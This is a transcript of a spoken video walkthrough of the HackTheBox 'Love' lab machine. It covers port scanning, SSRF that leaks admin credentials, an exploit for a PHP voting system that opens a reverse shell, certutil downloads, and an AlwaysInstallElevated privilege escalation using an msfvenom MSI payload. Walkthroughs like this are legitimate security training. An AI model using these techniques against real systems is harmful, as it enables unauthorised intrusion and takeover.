Hey guys, it's Ben, and today I'm going to be walking through the Love HackTheBox challenge. I've got the box up and running. Let's test that with a ping. There we go, ping. And we can see the box is returning pings, so let's begin with doing some scans. I'm going to do an nmap scan to enumerate the different ports to figure out where can I investigate further. I'm going to start off with a TACP, which is all ports, TAC-SV for a version service enumeration, TAC-SV for default NSC scripts, TAC-T4 for a speedy output. I'll paste the IP in there. I'll do TAC-PN to get rid of the ping check at the beginning, and TAC-N to get rid of the DNS resolution. And yeah, I'm going to output this as full-thorough.log. I have already ran this scan, so I'm not going to do it again. Let's have a look at the results. Cat full thorough. There we go. So let's go up to the top. We can see, look, port 80 is open. Service is HTTP. There is a web server running. We can see it is an Apache web server. Win64, it's running on Windows. So yeah, that's interesting. We can investigate this in a second. There is also 135, MSRPC, and 139 for NetBIOS. The regular ports you see open on a Windows machine. There is also port 443, which sort of looks like it can be HTTPS. There's some information here about the cert as well. There's this domain, staging.love.hackthebox. We can add this to our host file in a second. There is also port 445, which you'll recognise to be SMB, although it couldn't enumerate the actual service here. There was some sort of error, it looks sort of corrupted, but we can see the Windows version here, Windows 10 Pro. There is also port 3306 running MySQL. We can investigate this later if need be. And there is also another web server on port 5000. We do see this gives a 403 forbidden. So yeah, probably won't be able to access that, but we can have a look at that. There is all the MSRPC, remote procedure call ports, which you always see open, but they're not that useful, so I'm not going to look into that. There's also port 540 and 7680, which I don't really know what they do. I don't think they're going to be that useful for this challenge anyway. We can find out a bit more about the machine from the SMB OS Discovery NSE script. We can see, look, the host name, the computer name is Love, and it's in a work group. It's not domain joined. So yeah, so there's quite a lot of stuff to look at. We can look at SMB, but to start with, I'm going to look at these web servers, see what they reveal. The HTTP title of this is a voting system using PHP. I'm not sure if I mentioned that, but that is definitely something to look at. So let's start off with that, and let's open up Firefox, and let's just go to HTTP, this IP there, and we can see we're getting some sort of issue, and that is because I've got Burp Suite proxy on. Let's try this again, and we can access this. The voting system, yeah, that's about it. Sign in to start your session. What I am going to do, we did see these host names and domains here. I'm going to add these to my host file just so I don't have to keep on typing out the IP. And oh look, it looks like I've already got them in my host file. But yeah, love and staging.love.hackthebox. Those are the two host names I'm going to set. So now we can just go to, for example, HTTP love.hackthebox, and it points to the same website, this voting system website. You can have a look around the source code. We can look at the web technologies in use. There are quite a few JS libraries. You can see the Apache HTTP server version 2.4.46. If we wanted to, we could investigate if there's any vulnerabilities with this version. The same with the PHP version here. I'm not going to do that as it's most likely not going to be that. So yeah, there was that web server. There was also this staging.love.hackthebox. Let's check that out. Staging.love.hackthebox. And we can see this is a free file scanner. FFS will scan your files for recognized malware signatures. There is this demo which takes us, we can see in the bottom left hand corner, to beta.php. So we can look at that, and it looks like there's this specifier of the file URL. So a lot of interesting stuff to dig into here. Before I dig into that, what I am going to do is set up on this side two fuzzers, looking at the different directories and files which are hosted on each of these. So I'm going to make directories 80 and make directory 443. I'm going to cd into 80 on this one, and I'm going to cd into 443 on this. Let's just get a GoBuster scan going up. So GoBuster dir tag u http love.hackthebox user share word lists sec list discovery web content raft medium directories I'll start off with, and we'll tee this to fuzz.log. There we go. I'll let that do its thing there. We can see it is finding some results already, which is good. I'm going to do the same thing on here. GoBuster dir tag u http. This one is going to be staging.love.hackthebox. The word list is going to be user share word lists sec lists discovery web content raft medium files directory .log .txt, and I'll tee this to fuzz.log. I'll let that do its thing. That one has already run the directory, so I'm going to move straight on to the files for this one as well. Raft medium files. There we go, and I'll change what it's teeing it to files.log. There we go. That gave an issue. I need to tab. There we go. There we go. Okay, so it's asking us to specify file URL and the URL of the file to scan. So we could test this. We could host a web server locally, maybe see what it really does, see if it interacts with our web server, just play around really. So I'm just going to open a web server there on port 80. Let's just go HTTP, and then I'll put my IP here, 10.10.14.12, and we'll just see what this does. And it looks like it is it's getting the GET request, and it is displaying the output. We can see PHP is in use, so perhaps we can host a PHP file. For example, let's just do vi test.php, and let's just try something like echo, or let's just go system. Who am I? Can I get remote code execution? Will this work? Let's just find out really. Python HTTP server, and then we'll supply my IP there. There we go, test.php. Run this. Looks like it didn't display anything. Maybe that's because, didn't display anything. What about if we, for example, we can just change this to hello world, something like this. And then if I do the same thing, and then I didn't actually start up this again. There we go, it does display the hello world. So that is interesting, right? We can sort of get the page which is being displayed or whatever, so that's cool. There was this other web server here which was given the 403 forbidden, port 5000, so let's check that one out as well. Let's go to love.hackthebox and port 5000, and we can see, as expected, we are getting this 403 forbidden. You don't have permission to access this resource. So I'm guessing that's because I'm coming from some sort of external IP. Maybe it's only accepting requests from the local host internally. So that gave me the idea. How about I set this to be love.hackthebox on port 5000, and what happens here? Because now this request is going to be sent to the back end, and it's going to load this page from inside the web server instead of doing it externally. So maybe that would work. That didn't seem to work straight away. So how about instead of using the host name love.hackthebox, I just do localhost on port 5000. And what does this give us? And this does give us some result. It gives us these voting system administration. If you think back, that's this here, this voting system, and it looks like we've got some credentials here. So what I'm going to do is I'm going to copy these, and I'm going to go down here, and let's just to remove test.php. I'm going to vi findings.txt, paste this in here, and looks like we've gathered some credentials, findings.txt. So let's just give these a go. Let's see, can I use these credentials on this voting system? So there's this voter's ID there, and there is this here. Let's just go like this. I may need to. There we go. Let's give that a go there. Does this work? It doesn't. Can't find the voter with the ID. So it didn't recognize our username. If we go back to our directory and file enumeration, let's go to the directory enumeration. Let's cat fuzz doors. We can see it is finding an admin with the 301. So this is a page. Perhaps it's not here where we log on this admin page. And we can try this again. I'll put the password in there and username here. And it looks like we can log into this. We have found credentials for this voting system admin page. So I was looking around this, seeing if there's any cool functionality. I couldn't. So in the end, I decided to look for vulnerabilities for this version. It looks like this is created by source code stir. I hadn't really heard of that before, and it's this voting system. So let's search for voting, do some googling, voting system, source code stir, maybe vulnerabilities. Let's see if we can find any exploit. It looks like there is a few exploits. This one, it is looking like there's a unauthenticated RCE, and this one looks like a file upload which is authenticated. So maybe we didn't really need to find the credentials, but we did. So I'm going to start off with this one. Also, one thing to note, this is for voting system 1.0. I couldn't originally find a version disclosure on this website. I tried looking in the source code. Maybe I wasn't looking far enough. So I just took a guess. Look, an exploit exists. We do have credentials. Let's just see if this works. So that is what I did. Let's go to our exploits directory. I'll just do it here. There we go. Let's go out of here, and let's out of here again. Make directory. I already have one exploits. I'm going to wget this. There we go. This is, if we sub all 49, we can see, look, this is a Python script, right? So what I can do is just move 4945 to poc.py. Now I can sub all poc.py. There we go. It shows where we edit our settings here, so we can add our own IP here. So 10.10.14.12. There is this username, which we'll set that to admin. The password. Have I got this pasted again? Nope. Let's grab the password here. There we go. Copy. There we go. The reverse shell IP. Okay, so I was a bit stupid there. This is my IP. That's going to be the reverse shell IP. Sorry. Okay, I messed that up totally. 10.10.14.12. The website's URL. This is just love.hackthebox. The reverse shell port, I like doing it on port 44444, like so. It gives the payload here, and there's this big base 64 GSIP encoded payload there. And yeah, so what I'm going to do is I'm going to get a listener going over here. There we go. Let's get netcat nvlp 44444. Clear this up, and let's just run this. poc.py. Start a netcat listener on the port you chose and run. I'll give it another go. And we're not getting any response. Is this because this POC doesn't work, or is it because I've done something wrong? I will soon find out. Maybe we need to supply the full thing there. That didn't work, so that is definitely not the case. What about if I just supply the raw IP? 10.10. No. Let's ping this. Ping love.hackthebox. There we go. save that. We've got the listener going, and it looks like we've got some issues. Right, it's not working. So let's try another POC. Right, let's see if we can find another way to get in, or see if we're missing something. Right, maybe if we look back up here, I may have actually figured what it is, and I have. We don't supply this vote system directory here. We just go straight to the admin. So perhaps if I go like this, and let's just go like that, find and replace all of that. We'll try this again because I think it was trying to go to a non-existent directory with that vote system. That top level directory didn't exist, so all these wouldn't work in the payload. Let's try this again. Python port.free, and yeah, this time it did work. I managed to get a successful reverse shell. You can run commands like who am I, priv. Does Phoebe have any interesting privileges? Not really, but we can get the user flag now. So let's just cd out of here, cd into users, dir to see what users there are. This is Phoebe and administrator. So let's cd into Phoebe, dir, and in the desktop, there is the user.txt flag. We can get this flag without an issue. So we've got initial access. We want to privilege escalate to administrator. We can just do some like real quick easy checks. Can I cd into administrator? No. We could do see if there's any kernel exploits or any certain exploits for this specific version. We could enumerate the hot fixes. I'm not going to do that. That's not the nicest of solutions. I'm going to use WinPeas to enumerate this computer to see if there are any possible privilege escalation routes. We could do a manual enumeration, cd Phoebe. I'm not going to do that just because it takes a lot of effort, and sometimes it's quicker just to get WinPeas open and play with that, really. So let's cd into my opt directory. I think it's got hosted there. I do. I'm going to get a HTTP server, and now can I go down a bit? I want to get this in there. If I go like this and then go like that, there we go. This gets a better view. I'm going to use the cert util utility. So this is a genuine Windows binary for managing certificates. It can also be used as a lol bin, a living off the land binary to download files. So the syntax is like this: URL cache, I think it is at least, and then we specify the web server, which is going to be my IP, and the file is winpeas ne.exe. I can just save this as winpeas.exe, and we can see that we did get a request on our web server, and it did look like it was successful. We do have this WinPeas binary here, so let's just execute this, and let's see what this finds. Right, it does search for a lot of stuff, and it gives you a lot of results. So we'll have to quickly look through this and see what it finds. So yeah, it detects it's a virtual machine, showing about all the hot fixes. It's giving information on each of one of those. Not too interesting. It gives us a bit about the environment variables. It tells us whether there's an AV in place. It does give us the PowerShell history file, so this is definitely something we should look at. Maybe there's some administrator credentials in the PowerShell history file. That's definitely something to look at. And by the way, the interesting stuff is often set to red. So yeah, this is interesting as well, but it's highlighted in red. We could look at that, but it's not actually what I used to privesc. This really stood out to me. This always install elevated is set to 1 in HKLM and also in HKCU. This always install elevated is a registry key which basically allows any user to install MSIs as administrator, as local system. So that basically means if I wanted to craft a malicious MSI file, I would be able to execute it as local system and then privilege escalate. This stood out straight away, and this is what I used to privilege escalate. It is going to do some scanning of lots of files. I don't need to wait for this. I'm going to Control C, get another listener going, just because I don't want to wait for that after I found a fairly simple PE method. So let's cd back into Phoebe. There we go. Cd into users, cd into Phoebe, like so. Let's just cd into downloads. What I'm going to do is I'm going to, on this one over here, let's get to open make directory PE, so privilege escalation directory. I'm going to use MSF Venom. The payload I'm going to use, I could use Interpreter, but I find it a lot easier just to do reverse TCP shell. L-port, I'm going to listen on 443. L-host, my listening host is my IP, which is 10.10.14.12. The file I want is an MSI. I'm going to output this as pe.msi. We'll see if this runs without any errors. It looks like it is, which is good. I'm now going to get a listener up on here on NVLP 4443. There we go. And I'm going to copy this across. Let's get a web server going again and use that cert util lolbin to download the files. URL cache tac f http 10.10.14.12. The file I want is p.msi. I'll just save this as p.msi. And you can install MSIs with MSI exec, I think, or something. MSI, is this what it is? Yeah, I think so. MSI exec, I think there's a quiet flag, and there's also QN, and there's I, and then you just supply the MSI you want to install, and I believe all you need to do is this, and that was correct. We've now got a reverse shell. We can see, look, just to show we were running as Phoebe. When we use this MSI exec, because we've got those permission, those always install elevated registry entry set to 1. That allows us to install with elevated permissions, meaning if we go who am I here, we can see we are running as NT authority system. We can now go to users and go to administrator, just to prove the point on this one here. Just to prove the point, we cannot go to administrator there. So with privilege escalated to local system, we will now be able to get the root flag. So there you go, root flag's in there. So yeah, this challenge has been solved. So hope you've enjoyed, and I'll see you on the next one. Cheers.